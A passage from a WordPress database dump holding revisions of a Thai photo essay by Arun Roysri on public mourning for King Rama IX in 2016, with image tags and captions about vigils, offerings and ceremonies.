#993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4327\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4328\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"เสียงประสานจากใจ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4329\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4332\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<img class=\"aligncenter size-large wp-image-4333\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4337\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4338\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4340\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:19:46', '2018-11-12 08:19:46', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4413, 3, '2018-11-12 15:21:34', '2018-11-12 08:21:34', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4327\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4328\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"เสียงประสานจากใจ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4329\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4332\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<img class=\"aligncenter size-large wp-image-4333\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4337\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4338\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4339\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4340\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:21:34', '2018-11-12 08:21:34', '', 4341, 